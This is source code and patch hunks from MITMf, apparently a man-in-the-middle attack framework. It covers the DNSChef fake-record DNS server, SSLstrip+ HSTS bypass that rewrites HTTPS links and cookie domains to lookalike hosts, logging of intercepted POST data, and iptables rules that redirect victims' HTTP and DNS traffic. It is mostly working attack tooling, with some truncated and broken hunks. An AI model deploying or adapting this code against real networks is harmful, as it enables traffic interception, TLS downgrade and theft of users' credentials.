# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
|
||||
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
|
||||
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|
||||
|
||||
import threading, random, operator, time
|
||||
import SocketServer, socket, sys, os
|
||||
import binascii
|
||||
import string
|
||||
import base64
|
||||
import time
|
||||
import logging
|
||||
|
||||
from configobj import ConfigObj
|
||||
from core.configwatcher import ConfigWatcher
|
||||
|
||||
from dnslib import *
|
||||
from IPy import IP
|
||||
|
||||
formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
|
||||
dnschef_logger = logging.getLogger('dnschef')
|
||||
fileHandler = logging.FileHandler("./logs/dnschef/dnschef.log")
|
||||
fileHandler.setFormatter(formatter)
|
||||
dnschef_logger.addHandler(fileHandler)
|
||||
|
||||
# DNSHandler Mixin. The class contains generic functions to parse DNS requests and
|
||||
# calculate an appropriate response based on user parameters.
|
||||
# DNSHandler Mixin. The class contains generic functions to parse DNS requests and
# calculate an appropriate response based on user parameters.
class DNSHandler():
    """Mixin shared by the UDP and TCP request handlers.

    Parses a raw DNS request, answers it from the fake records configured
    on the DNSChef singleton (or performs the SSLstrip+ HSTS-bypass
    rewriting), and proxies anything else to a real nameserver.
    """

    def _build_rdata(self, qtype, fake_record):
        """Convert the textual fake record for *qtype* into a dnslib rdata object.

        Consolidates the per-type parsing that was previously duplicated
        (inconsistently) between the single-type and ANY answer paths.
        """
        if qtype == "AAAA":
            # IPv6 needs additional work before inclusion: expand the
            # address into a tuple of byte values for dnslib.
            ipv6 = IP(fake_record)
            ipv6_bin = ipv6.strBin()
            ipv6_hex_tuple = [int(ipv6_bin[i:i+8], 2) for i in range(0, len(ipv6_bin), 8)]
            return RDMAP[qtype](ipv6_hex_tuple)

        if qtype == "SOA":
            mname, rname, t1, t2, t3, t4, t5 = fake_record.split(" ")
            times = tuple([int(t) for t in [t1, t2, t3, t4, t5]])

            # dnslib doesn't like trailing dots
            if mname[-1] == ".": mname = mname[:-1]
            if rname[-1] == ".": rname = rname[:-1]

            return RDMAP[qtype](mname, rname, times)

        if qtype == "NAPTR":
            order, preference, flags, service, regexp, replacement = fake_record.split(" ")

            # dnslib doesn't like trailing dots (guard against an empty
            # replacement field as well)
            if replacement and replacement[-1] == ".": replacement = replacement[:-1]

            return RDMAP[qtype](int(order), int(preference), flags, service, regexp, DNSLabel(replacement))

        if qtype == "SRV":
            priority, weight, port, target = fake_record.split(" ")
            if target[-1] == ".": target = target[:-1]

            return RDMAP[qtype](int(priority), int(weight), int(port), target)

        if qtype == "DNSKEY":
            flags, protocol, algorithm, key = fake_record.split(" ")
            key = base64.b64decode(("".join(key)).encode('ascii'))

            return RDMAP[qtype](int(flags), int(protocol), int(algorithm), key)

        if qtype == "RRSIG":
            covered, algorithm, labels, orig_ttl, sig_exp, sig_inc, key_tag, name, sig = fake_record.split(" ")
            covered = getattr(QTYPE, covered)  # NOTE: Covered QTYPE
            sig_exp = int(time.mktime(time.strptime(sig_exp + 'GMT', "%Y%m%d%H%M%S%Z")))
            sig_inc = int(time.mktime(time.strptime(sig_inc + 'GMT', "%Y%m%d%H%M%S%Z")))
            if name[-1] == '.': name = name[:-1]
            sig = base64.b64decode(("".join(sig)).encode('ascii'))

            return RDMAP[qtype](covered, int(algorithm), int(labels), int(orig_ttl), sig_exp, sig_inc, int(key_tag), name, sig)

        # Default case (A, CNAME, TXT, ...): single-field record.
        # dnslib doesn't like trailing dots
        if fake_record[-1] == ".": fake_record = fake_record[:-1]
        return RDMAP[qtype](fake_record)

    def parse(self, data):
        """Parse a raw DNS request and return the packed response.

        data -- wire-format DNS message from the client.
        Returns packed response bytes, or "" when the request is invalid
        or proxying failed.
        """
        nametodns   = DNSChef.getInstance().nametodns
        nameservers = DNSChef.getInstance().nameservers
        hsts        = DNSChef.getInstance().hsts
        hstsconfig  = DNSChef.getInstance().real_records

        response = ""

        try:
            # Parse data as DNS
            d = DNSRecord.parse(data)
        except Exception:
            dnschef_logger.info("{} ERROR: invalid DNS request".format(self.client_address[0]))
        else:
            # Only Process DNS Queries
            if QR[d.header.qr] == "QUERY":

                # NOTE: Do not lowercase qname here, because we want to see
                # any case request weirdness in the logs.
                qname = str(d.q.qname)

                # Chop off the last period
                if qname[-1] == '.': qname = qname[:-1]

                qtype = QTYPE[d.q.qtype]

                # Find all matching fake DNS records for the query name or get False
                fake_records = dict()
                for record in nametodns:
                    fake_records[record] = self.findnametodns(qname, nametodns[record])

                if hsts:
                    # SSLstrip+ HSTS bypass: map the tokenized hostname back
                    # to the real one before resolving.
                    if qname in hstsconfig:
                        return self.hstsbypass(hstsconfig[qname], qname, nameservers, d)
                    elif qname[:4] == 'wwww':
                        return self.hstsbypass(qname[1:], qname, nameservers, d)
                    elif qname[:3] == 'web':
                        return self.hstsbypass(qname[3:], qname, nameservers, d)

                # Check if there is a fake record for the current request qtype
                if qtype in fake_records and fake_records[qtype]:
                    fake_record = fake_records[qtype]

                    # Create a custom response to the query
                    response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q)

                    dnschef_logger.info("{} cooking the response of type '{}' for {} to {}".format(self.client_address[0], qtype, qname, fake_record))

                    response.add_answer(RR(qname, getattr(QTYPE, qtype), rdata=self._build_rdata(qtype, fake_record)))
                    response = response.pack()

                elif qtype == "*" and None not in fake_records.values():
                    dnschef_logger.info("{} cooking the response of type '{}' for {} with {}".format(self.client_address[0], "ANY", qname, "all known fake records."))

                    response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q)

                    for qtype, fake_record in fake_records.items():
                        if fake_record:
                            # BUGFIX: AAAA answers used to be converted but
                            # never added here; every type now goes through
                            # the shared rdata builder and is appended.
                            response.add_answer(RR(qname, getattr(QTYPE, qtype), rdata=self._build_rdata(qtype, fake_record)))

                    response = response.pack()

                # Proxy the request
                else:
                    dnschef_logger.debug("[DNSChef] {} proxying the response of type '{}' for {}".format(self.client_address[0], qtype, qname))

                    nameserver_tuple = random.choice(nameservers).split('#')
                    response = self.proxyrequest(data, *nameserver_tuple)

        return response

    def findnametodns(self, qname, nametodns):
        """Find the appropriate fake value for a queried name.

        Matches *qname* against the (already lowercased) wildcard patterns
        in *nametodns*; returns the configured value, or False when no
        pattern matches.
        """
        # Make qname case insensitive
        qname = qname.lower()

        # Split and reverse qname into components for matching.
        qnamelist = qname.split('.')
        qnamelist.reverse()

        # HACK: It is important to search the nametodns dictionary before iterating it so that
        # global matching ['*.*.*.*.*.*.*.*.*.*'] will match last. Use sorting for that.
        for domain, host in sorted(nametodns.items(), key=operator.itemgetter(1)):

            # NOTE: It is assumed that domain name was already lowercased
            # when it was loaded through --file, --fakedomains or --truedomains
            # don't want to waste time lowercasing domains on every request.

            # Split and reverse domain into components for matching
            domain = domain.split('.')
            domain.reverse()

            # Compare components in reverse; missing components are padded
            # with None, and '*' in the pattern matches anything.
            matched = True
            for i in range(max(len(qnamelist), len(domain))):
                a = qnamelist[i] if i < len(qnamelist) else None
                b = domain[i] if i < len(domain) else None
                if a != b and b != "*":
                    matched = False
                    break

            if matched:
                # Could be a real IP or False if we are doing reverse matching with 'truedomains'
                return host

        return False

    def proxyrequest(self, request, host, port="53", protocol="udp"):
        """Obtain a response from a real DNS server.

        Sends the raw *request* to host:port over UDP or TCP and returns
        the raw reply, or None when the upstream query failed.
        """
        reply = None
        try:
            family = socket.AF_INET6 if DNSChef.getInstance().ipv6 else socket.AF_INET
            socktype = socket.SOCK_DGRAM if protocol == "udp" else socket.SOCK_STREAM
            sock = socket.socket(family, socktype)
            sock.settimeout(3.0)

            if protocol == "udp":
                sock.sendto(request, (host, int(port)))
                reply = sock.recv(1024)
            else:
                sock.connect((host, int(port)))

                # Add length for the TCP request
                length = binascii.unhexlify("%04x" % len(request))
                sock.sendall(length + request)

                # Strip length from the response
                reply = sock.recv(1024)[2:]

            sock.close()

        except Exception as e:
            dnschef_logger.warning("could not proxy request: {}".format(e))
        else:
            return reply

    def hstsbypass(self, real_domain, fake_domain, nameservers, d):
        """Resolve *real_domain* upstream and answer as *fake_domain*.

        Used by SSLstrip+ to hand out real IPs under the tokenized
        (HSTS-free) hostname the client was redirected to.
        """
        dnschef_logger.info("{} resolving '{}' to '{}' for HSTS bypass".format(self.client_address[0], fake_domain, real_domain))

        response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q)

        nameserver_tuple = random.choice(nameservers).split('#')

        # First proxy the request with the real domain
        q = DNSRecord.question(real_domain).pack()
        r = self.proxyrequest(q, *nameserver_tuple)

        # Create the DNS response, renaming answers for the real domain
        # back to the fake one the client asked about.
        for res in DNSRecord.parse(r).rr:
            if res.get_rname() == real_domain:
                res.set_rname(fake_domain)
            response.add_answer(res)

        return response.pack()
||||
# UDP DNS Handler for incoming requests
|
||||
class UDPHandler(DNSHandler, SocketServer.BaseRequestHandler):
    """Serves DNS over UDP, delegating all parsing to DNSHandler."""

    def handle(self):
        # self.request is a (datagram, socket) pair for UDP servers.
        # NOTE: the local is deliberately not named 'socket' so it does
        # not shadow the socket module.
        packet, conn = self.request
        reply = self.parse(packet)

        # Only answer when parsing actually produced a response
        if reply:
            conn.sendto(reply, self.client_address)
|
||||
|
||||
# TCP DNS Handler for incoming requests
|
||||
class TCPHandler(DNSHandler, SocketServer.BaseRequestHandler):
    """Serves DNS over TCP, delegating all parsing to DNSHandler."""

    def handle(self):
        raw = self.request.recv(1024)

        # TCP DNS messages carry a two-byte length prefix; strip it
        # before handing the payload to the shared parser.
        reply = self.parse(raw[2:])

        if reply:
            # Re-attach the two-byte length prefix required by the
            # TCP DNS protocol before sending the answer back.
            prefix = binascii.unhexlify("%04x" % len(reply))
            self.request.sendall(prefix + reply)
|
||||
|
||||
class ThreadedUDPServer(SocketServer.ThreadingMixIn, SocketServer.UDPServer):
    """Threaded UDP server whose address family follows DNSChef's IPv6 setting."""

    # Override SocketServer.UDPServer.__init__ to pick the address family
    # from the DNSChef singleton before binding.
    def __init__(self, server_address, RequestHandlerClass):
        if DNSChef.getInstance().ipv6:
            self.address_family = socket.AF_INET6
        else:
            self.address_family = socket.AF_INET

        SocketServer.UDPServer.__init__(self, server_address, RequestHandlerClass)
|
||||
|
||||
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
    """Threaded TCP server whose address family follows DNSChef's IPv6 setting."""

    # Allow fast restarts by reusing the listening address
    allow_reuse_address = True

    # Override SocketServer.TCPServer.__init__ to pick the address family
    # from the DNSChef singleton before binding.
    def __init__(self, server_address, RequestHandlerClass):
        if DNSChef.getInstance().ipv6:
            self.address_family = socket.AF_INET6
        else:
            self.address_family = socket.AF_INET

        SocketServer.TCPServer.__init__(self, server_address, RequestHandlerClass)
|
||||
|
||||
class DNSChef(ConfigWatcher):
    """Singleton DNS server configured from the [MITMf][DNS] config section.

    Holds the fake-record tables consumed by DNSHandler and (re)loads them
    whenever the watched configuration file changes.
    """

    _instance = None

    # Defaults; overwritten by onConfigChange() from the config file.
    tcp            = False
    ipv6           = False
    hsts           = False
    real_records   = dict()    # fake hostname -> real hostname (SSLstrip+)
    nametodns      = dict()    # qtype -> {domain pattern -> fake record}
    server_address = "0.0.0.0"
    nameservers    = ["8.8.8.8"]
    port           = 53

    @staticmethod
    def getInstance():
        # Lazily create the shared singleton instance
        if DNSChef._instance is None:
            DNSChef._instance = DNSChef()
        return DNSChef._instance

    def onConfigChange(self):
        """(Re)load all DNS settings from the [MITMf][DNS] config section."""
        config = self.config['MITMf']['DNS']

        self.port = int(config['port'])

        # Main storage of domain filters
        # NOTE: RDMAP is a dictionary map of qtype strings to handling classes
        for qtype in RDMAP.keys():
            self.nametodns[qtype] = dict()

        if config['ipv6'].lower() == 'on':
            self.ipv6 = True

        # Use alternative DNS servers
        if config['nameservers']:
            self.nameservers = config['nameservers'].split(',')

        # Adjust the default for IPv6.
        # BUGFIX: this used to run *before* the generic assignment above
        # (which unconditionally overwrote it) and assigned a bare string,
        # so the IPv6 default nameserver never actually took effect.
        if self.ipv6 and self.nameservers == ["8.8.8.8"]:
            self.nameservers = ["2001:4860:4860::8888"]

        # Load per-qtype fake record sections ([[[A]]], [[[AAAA]]], ...)
        for section in config.sections:
            if section in self.nametodns:
                for domain, record in config[section].items():
                    # Make domain case insensitive
                    self.nametodns[section][domain.lower()] = record

        # SSLstrip+ mapping: real hostname -> tokenized hostname, stored
        # reversed so DNSHandler can look up by the tokenized name.
        for k, v in self.config["SSLstrip+"].items():
            self.real_records[v] = k

    def setHstsBypass(self):
        # Enables the SSLstrip+ HSTS-bypass resolution path in DNSHandler
        self.hsts = True

    def start(self):
        """Load the config, start watching it, and launch the DNS server."""
        self.onConfigChange()
        self.startConfigWatch()

        if self.config['MITMf']['DNS']['tcp'].lower() == 'on':
            self.startTCP()
        else:
            self.startUDP()

    def _serve(self, server):
        # Run the server on a daemon thread -- that thread will then start
        # more threads for each request, and dies with the main thread.
        server_thread = threading.Thread(target=server.serve_forever)
        server_thread.daemon = True
        server_thread.start()

    # Initialize and start the UDP DNS server
    def startUDP(self):
        self._serve(ThreadedUDPServer((self.server_address, int(self.port)), UDPHandler))

    # Initialize and start the TCP DNS server
    def startTCP(self):
        self._serve(ThreadedTCPServer((self.server_address, int(self.port)), TCPHandler))
|
|
@ -49,17 +49,15 @@ class ClientRequest(Request):
|
|||
Request.__init__(self, channel, queued)
|
||||
self.reactor = reactor
|
||||
self.urlMonitor = URLMonitor.getInstance()
|
||||
self.hsts = URLMonitor.getInstance().isHstsBypass()
|
||||
self.hsts = URLMonitor.getInstance().hsts
|
||||
self.cookieCleaner = CookieCleaner.getInstance()
|
||||
self.dnsCache = DnsCache.getInstance()
|
||||
self.plugins = ProxyPlugins.getInstance()
|
||||
#self.uniqueId = random.randint(0, 10000)
|
||||
|
||||
#Use are own DNS server instead of reactor.resolve()
|
||||
self.resolver = URLMonitor.getInstance().getResolver()
|
||||
self.customResolver = dns.resolver.Resolver()
|
||||
self.customResolver.nameservers = ['127.0.0.1']
|
||||
self.customResolver.port = URLMonitor.getInstance().getResolverPort()
|
||||
|
||||
def cleanHeaders(self):
|
||||
headers = self.getAllHeaders().copy()
|
||||
|
@ -70,7 +68,7 @@ class ClientRequest(Request):
|
|||
if self.hsts:
|
||||
|
||||
if 'referer' in headers:
|
||||
real = self.urlMonitor.real
|
||||
real = self.urlMonitor.getHstsConfig()[0]
|
||||
if len(real) > 0:
|
||||
dregex = re.compile("({})".format("|".join(map(re.escape, real.keys()))))
|
||||
headers['referer'] = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), headers['referer'])
|
||||
|
@ -133,7 +131,7 @@ class ClientRequest(Request):
|
|||
if self.hsts:
|
||||
|
||||
host = self.urlMonitor.URLgetRealHost(str(host))
|
||||
real = self.urlMonitor.real
|
||||
real = self.urlMonitor.getHstsConfig()[0]
|
||||
patchDict = self.urlMonitor.patchDict
|
||||
url = 'http://' + host + path
|
||||
self.uri = url # set URI to absolute
|
||||
|
@ -179,7 +177,7 @@ class ClientRequest(Request):
|
|||
self.proxyViaHTTP(address, self.method, path, postData, headers, port)
|
||||
|
||||
def handleHostResolvedError(self, error):
|
||||
mitmf_logger.debug("[ClientRequest] Host resolution error: " + str(error))
|
||||
mitmf_logger.debug("[ClientRequest] Host resolution error: {}".format(error))
|
||||
try:
|
||||
self.finish()
|
||||
except:
|
||||
|
@ -195,16 +193,20 @@ class ClientRequest(Request):
|
|||
|
||||
mitmf_logger.debug("[ClientRequest] Host not cached.")
|
||||
|
||||
if self.resolver == 'dnschef':
|
||||
if self.urlMonitor.getResolver() == 'dnschef':
|
||||
|
||||
self.customResolver.port = self.urlMonitor.getResolverPort()
|
||||
|
||||
try:
|
||||
mitmf_logger.debug("[ClientRequest] Resolving with DNSChef")
|
||||
address = str(self.customResolver.query(host)[0].address)
|
||||
return defer.succeed(address)
|
||||
except Exception:
|
||||
mitmf_logger.debug("[ClientRequest] Exception occured, falling back to reactor.resolve()")
|
||||
mitmf_logger.debug("[ClientRequest] Exception occured, falling back to Twisted")
|
||||
return reactor.resolve(host)
|
||||
|
||||
elif self.resolver == 'twisted':
|
||||
elif self.urlMonitor.getResolver() == 'twisted':
|
||||
mitmf_logger.debug("[ClientRequest] Resolving with Twisted")
|
||||
return reactor.resolve(host)
|
||||
|
||||
def process(self):
|
||||
|
|
|
@ -40,7 +40,7 @@ class SSLServerConnection(ServerConnection):
|
|||
def __init__(self, command, uri, postData, headers, client):
|
||||
ServerConnection.__init__(self, command, uri, postData, headers, client)
|
||||
self.urlMonitor = URLMonitor.getInstance()
|
||||
self.hsts = URLMonitor.getInstance().isHstsBypass()
|
||||
self.hsts = URLMonitor.getInstance().hsts
|
||||
|
||||
def getLogLevel(self):
|
||||
return logging.INFO
|
||||
|
@ -58,7 +58,7 @@ class SSLServerConnection(ServerConnection):
|
|||
if v[:7].lower()==' domain':
|
||||
dominio=v.split("=")[1]
|
||||
mitmf_logger.debug("[SSLServerConnection][HSTS] Parsing cookie domain parameter: %s"%v)
|
||||
real = self.urlMonitor.sustitucion
|
||||
real = self.urlMonitor.getHstsConfig()[1]
|
||||
if dominio in real:
|
||||
v=" Domain=%s"%real[dominio]
|
||||
mitmf_logger.debug("[SSLServerConnection][HSTS] New cookie domain parameter: %s"%v)
|
||||
|
@ -85,13 +85,13 @@ class SSLServerConnection(ServerConnection):
|
|||
if ((not link.startswith('http')) and (not link.startswith('/'))):
|
||||
absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link
|
||||
|
||||
mitmf_logger.debug("Found path-relative link in secure transmission: " + link)
|
||||
mitmf_logger.debug("New Absolute path-relative link: " + absoluteLink)
|
||||
mitmf_logger.debug("[SSLServerConnection] Found path-relative link in secure transmission: " + link)
|
||||
mitmf_logger.debug("[SSLServerConnection] New Absolute path-relative link: " + absoluteLink)
|
||||
elif not link.startswith('http'):
|
||||
absoluteLink = "http://"+self.headers['host']+link
|
||||
|
||||
mitmf_logger.debug("Found relative link in secure transmission: " + link)
|
||||
mitmf_logger.debug("New Absolute link: " + absoluteLink)
|
||||
mitmf_logger.debug("[SSLServerConnection] Found relative link in secure transmission: " + link)
|
||||
mitmf_logger.debug("[SSLServerConnection] New Absolute link: " + absoluteLink)
|
||||
|
||||
if not absoluteLink == "":
|
||||
absoluteLink = absoluteLink.replace('&', '&')
|
||||
|
|
|
@ -55,8 +55,8 @@ class ServerConnection(HTTPClient):
|
|||
self.client = client
|
||||
self.clientInfo = None
|
||||
self.urlMonitor = URLMonitor.getInstance()
|
||||
self.hsts = URLMonitor.getInstance().isHstsBypass()
|
||||
self.app = URLMonitor.getInstance().isAppCachePoisoning()
|
||||
self.hsts = URLMonitor.getInstance().hsts
|
||||
self.app = URLMonitor.getInstance().app
|
||||
self.plugins = ProxyPlugins.getInstance()
|
||||
self.isImageRequest = False
|
||||
self.isCompressed = False
|
||||
|
@ -70,7 +70,7 @@ class ServerConnection(HTTPClient):
|
|||
if self.command == 'GET':
|
||||
try:
|
||||
user_agent = parse(self.headers['user-agent'])
|
||||
self.clientInfo = "{0} [type:{1}-{2} os:{3}] ".format(self.client.getClientIP(), user_agent.browser.family, user_agent.browser.version[0], user_agent.os.family)
|
||||
self.clientInfo = "{} [type:{}-{} os:{}] ".format(self.client.getClientIP(), user_agent.browser.family, user_agent.browser.version[0], user_agent.os.family)
|
||||
except:
|
||||
self.clientInfo = "{} ".format(self.client.getClientIP())
|
||||
|
||||
|
@ -93,7 +93,7 @@ class ServerConnection(HTTPClient):
|
|||
elif 'keylog' in self.uri:
|
||||
self.plugins.hook()
|
||||
else:
|
||||
mitmf_logger.warning("{0} {1} Data ({2}):\n{3}".format(self.client.getClientIP(), self.getPostPrefix(), self.headers['host'], self.postData))
|
||||
mitmf_logger.warning("{} {} Data ({}):\n{}".format(self.client.getClientIP(), self.getPostPrefix(), self.headers['host'], self.postData))
|
||||
self.transport.write(self.postData)
|
||||
|
||||
def connectionMade(self):
|
||||
|
@ -106,7 +106,7 @@ class ServerConnection(HTTPClient):
|
|||
self.sendPostData()
|
||||
|
||||
def handleStatus(self, version, code, message):
|
||||
mitmf_logger.debug("[ServerConnection] Server response: {0} {1} {2}".format(version, code, message))
|
||||
mitmf_logger.debug("[ServerConnection] Server response: {} {} {}".format(version, code, message))
|
||||
self.client.setResponseCode(int(code), message)
|
||||
|
||||
def handleHeader(self, key, value):
|
||||
|
|
|
@ -34,12 +34,12 @@ class ServerConnectionFactory(ClientFactory):
|
|||
return self.protocol(self.command, self.uri, self.postData, self.headers, self.client)
|
||||
|
||||
def clientConnectionFailed(self, connector, reason):
|
||||
mitmf_logger.debug("Server connection failed.")
|
||||
mitmf_logger.debug("[ServerConnectionFactory] Server connection failed.")
|
||||
|
||||
destination = connector.getDestination()
|
||||
|
||||
if (destination.port != 443):
|
||||
mitmf_logger.debug("Retrying via SSL")
|
||||
mitmf_logger.debug("[ServerConnectionFactory] Retrying via SSL")
|
||||
self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443)
|
||||
else:
|
||||
try:
|
||||
|
|
|
@ -18,6 +18,7 @@
|
|||
|
||||
import re, os
|
||||
import logging
|
||||
from core.ConfigWatcher import ConfigWatcher
|
||||
|
||||
mitmf_logger = logging.getLogger('mimtf')
|
||||
|
||||
|
@ -31,8 +32,6 @@ class URLMonitor:
|
|||
# Start the arms race, and end up here...
|
||||
javascriptTrickery = [re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")]
|
||||
_instance = None
|
||||
sustitucion = {} # LEO: diccionario host / sustitucion
|
||||
real = {} # LEO: diccionario host / real
|
||||
patchDict = {
|
||||
'https:\/\/fbstatic-a.akamaihd.net':'http:\/\/webfbstatic-a.akamaihd.net',
|
||||
'https:\/\/www.facebook.com':'http:\/\/social.facebook.com',
|
||||
|
@ -46,9 +45,6 @@ class URLMonitor:
|
|||
self.faviconReplacement = False
|
||||
self.hsts = False
|
||||
self.app = False
|
||||
self.hsts_config = None
|
||||
self.resolver = 'dnschef'
|
||||
self.resolverport = 53
|
||||
|
||||
@staticmethod
|
||||
def getInstance():
|
||||
|
@ -57,21 +53,13 @@ class URLMonitor:
|
|||
|
||||
return URLMonitor._instance
|
||||
|
||||
#This is here because I'm lazy
|
||||
def setResolver(self, resolver):
|
||||
self.resolver = str(resolver).lower()
|
||||
|
||||
#This is here because I'm lazy
|
||||
def getResolver(self):
|
||||
return self.resolver
|
||||
|
||||
#This is here because I'm lazy
|
||||
def setResolverPort(self, port):
|
||||
self.resolverport = int(port)
|
||||
return ConfigWatcher.getInstance().getConfig()['MITMf']['DNS']['resolver'].lower()
|
||||
|
||||
#This is here because I'm lazy
|
||||
def getResolverPort(self):
|
||||
return self.resolverport
|
||||
return int(ConfigWatcher.getInstance().getConfig()['MITMf']['DNS']['port'])
|
||||
|
||||
def isSecureLink(self, client, url):
|
||||
for expression in URLMonitor.javascriptTrickery:
|
||||
|
@ -92,7 +80,7 @@ class URLMonitor:
|
|||
s.add(to_url)
|
||||
return
|
||||
url_set = set([from_url, to_url])
|
||||
mitmf_logger.debug("[URLMonitor][AppCachePoison] Set redirection: %s" % url_set)
|
||||
mitmf_logger.debug("[URLMonitor][AppCachePoison] Set redirection: {}".format(url_set))
|
||||
self.redirects.append(url_set)
|
||||
|
||||
def getRedirectionSet(self, url):
|
||||
|
@ -123,15 +111,15 @@ class URLMonitor:
|
|||
port = 443
|
||||
|
||||
if self.hsts:
|
||||
if not self.sustitucion.has_key(host):
|
||||
if not self.getHstsConfig[1].has_key(host):
|
||||
lhost = host[:4]
|
||||
if lhost=="www.":
|
||||
self.sustitucion[host] = "w"+host
|
||||
self.real["w"+host] = host
|
||||
self.getHstsConfig[1][host] = "w"+host
|
||||
self.getHstsConfig[0]["w"+host] = host
|
||||
else:
|
||||
self.sustitucion[host] = "web"+host
|
||||
self.real["web"+host] = host
|
||||
mitmf_logger.debug("[URLMonitor][HSTS] SSL host (%s) tokenized (%s)" % (host,self.sustitucion[host]) )
|
||||
self.getHstsConfig[1][host] = "web"+host
|
||||
self.getHstsConfig[0]["web"+host] = host
|
||||
mitmf_logger.debug("[URLMonitor][HSTS] SSL host ({}) tokenized ({})".format(host, self.getHstsConfig[1][host]))
|
||||
|
||||
url = 'http://' + host + path
|
||||
#mitmf_logger.debug("HSTS stripped URL: %s %s"%(client, url))
|
||||
|
@ -139,7 +127,7 @@ class URLMonitor:
|
|||
self.strippedURLs.add((client, url))
|
||||
self.strippedURLPorts[(client, url)] = int(port)
|
||||
|
||||
return 'http://'+ self.sustitucion[host] + path
|
||||
return 'http://'+ self.getHstsConfig[1][host] + path
|
||||
|
||||
else:
|
||||
url = method + host + path
|
||||
|
@ -150,40 +138,35 @@ class URLMonitor:
|
|||
def setFaviconSpoofing(self, faviconSpoofing):
|
||||
self.faviconSpoofing = faviconSpoofing
|
||||
|
||||
def setHstsBypass(self, hstsconfig):
|
||||
self.hsts = True
|
||||
self.hsts_config = hstsconfig
|
||||
def getHstsConfig(self):
|
||||
sustitucion = dict()
|
||||
real = dict()
|
||||
|
||||
for k,v in self.hsts_config.iteritems():
|
||||
self.sustitucion[k] = v
|
||||
self.real[v] = k
|
||||
for k,v in ConfigWatcher.getInstance().getConfig()['SSLstrip+']:
|
||||
sustitucion[k] = v
|
||||
real[v] = k
|
||||
|
||||
return (real, sustitucion)
|
||||
|
||||
def setHstsBypass(self):
|
||||
self.hsts = True
|
||||
|
||||
def setAppCachePoisoning(self):
|
||||
self.app = True
|
||||
|
||||
def setClientLogging(self, clientLogging):
|
||||
self.clientLogging = clientLogging
|
||||
|
||||
def isFaviconSpoofing(self):
|
||||
return self.faviconSpoofing
|
||||
|
||||
def isClientLogging(self):
|
||||
return self.clientLogging
|
||||
|
||||
def isHstsBypass(self):
|
||||
return self.hsts
|
||||
|
||||
def isAppCachePoisoning(self):
|
||||
return self.app
|
||||
|
||||
def isSecureFavicon(self, client, url):
|
||||
return ((self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1))
|
||||
|
||||
def URLgetRealHost(self, host):
|
||||
mitmf_logger.debug("[URLMonitor][HSTS] Parsing host: %s"% host)
|
||||
if self.real.has_key(host):
|
||||
mitmf_logger.debug("[URLMonitor][HSTS] Found host in list: %s"% self.real[host])
|
||||
return self.real[host]
|
||||
mitmf_logger.debug("[URLMonitor][HSTS] Parsing host: {}".format(host))
|
||||
|
||||
if self.getHstsConfig()[0].has_key(host):
|
||||
mitmf_logger.debug("[URLMonitor][HSTS] Found host in list: {}".format(self.getHstsConfig()[0][host]))
|
||||
return self.getHstsConfig()[0][host]
|
||||
|
||||
else:
|
||||
mitmf_logger.debug("[URLMonitor][HSTS] Host not in list: %s"% host)
|
||||
mitmf_logger.debug("[URLMonitor][HSTS] Host not in list: {}".format(host))
|
||||
return host
|
||||
|
|
|
@ -20,18 +20,12 @@
|
|||
#
|
||||
|
||||
import os
|
||||
import random
|
||||
import linecache
|
||||
import sys
|
||||
import random
|
||||
import logging
|
||||
|
||||
def PrintException():
|
||||
exc_type, exc_obj, tb = sys.exc_info()
|
||||
f = tb.tb_frame
|
||||
lineno = tb.tb_lineno
|
||||
filename = f.f_code.co_filename
|
||||
linecache.checkcache(filename)
|
||||
line = linecache.getline(filename, lineno, f.f_globals)
|
||||
return '({}, LINE {} "{}"): {}'.format(filename, lineno, line.strip(), exc_obj)
|
||||
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
|
||||
from scapy.all import get_if_addr, get_if_hwaddr
|
||||
|
||||
class SystemConfig:
|
||||
|
||||
|
@ -41,6 +35,25 @@ class SystemConfig:
|
|||
file.write(str(value))
|
||||
file.close()
|
||||
|
||||
@staticmethod
|
||||
def getIP(interface):
|
||||
try:
|
||||
ip_address = get_if_addr(interface)
|
||||
if (ip_address == "0.0.0.0") or (ip_address is None):
|
||||
sys.exit("[-] Interface {} does not have an assigned IP address".format(interface))
|
||||
|
||||
return ip_address
|
||||
except Exception, e:
|
||||
sys.exit("[-] Error retrieving IP address from {}: {}".format(interface, e))
|
||||
|
||||
@staticmethod
|
||||
def getMAC(interface):
|
||||
try:
|
||||
mac_address = get_if_hwaddr(interface)
|
||||
return mac_address
|
||||
except Exception, e:
|
||||
sys.exit("[-] Error retrieving MAC address from {}: {}".format(interface, e))
|
||||
|
||||
class IpTables:
|
||||
|
||||
_instance = None
|
||||
|
@ -62,11 +75,11 @@ class IpTables:
|
|||
self.http = False
|
||||
|
||||
def HTTP(self, http_redir_port):
|
||||
os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port %s' % http_redir_port)
|
||||
os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port {}'.format(http_redir_port))
|
||||
self.http = True
|
||||
|
||||
def DNS(self, ip, port):
|
||||
os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to %s:%s' % (ip, port))
|
||||
os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to {}:{}'.format(ip, port))
|
||||
self.dns = True
|
||||
|
||||
class Banners:
|
||||
|
@ -122,6 +135,15 @@ class Banners:
|
|||
\/__/ \/__/ \/__/ \/__/ \/__/
|
||||
"""
|
||||
|
||||
banner5 = """
|
||||
███╗ ███╗██╗████████╗███╗ ███╗███████╗
|
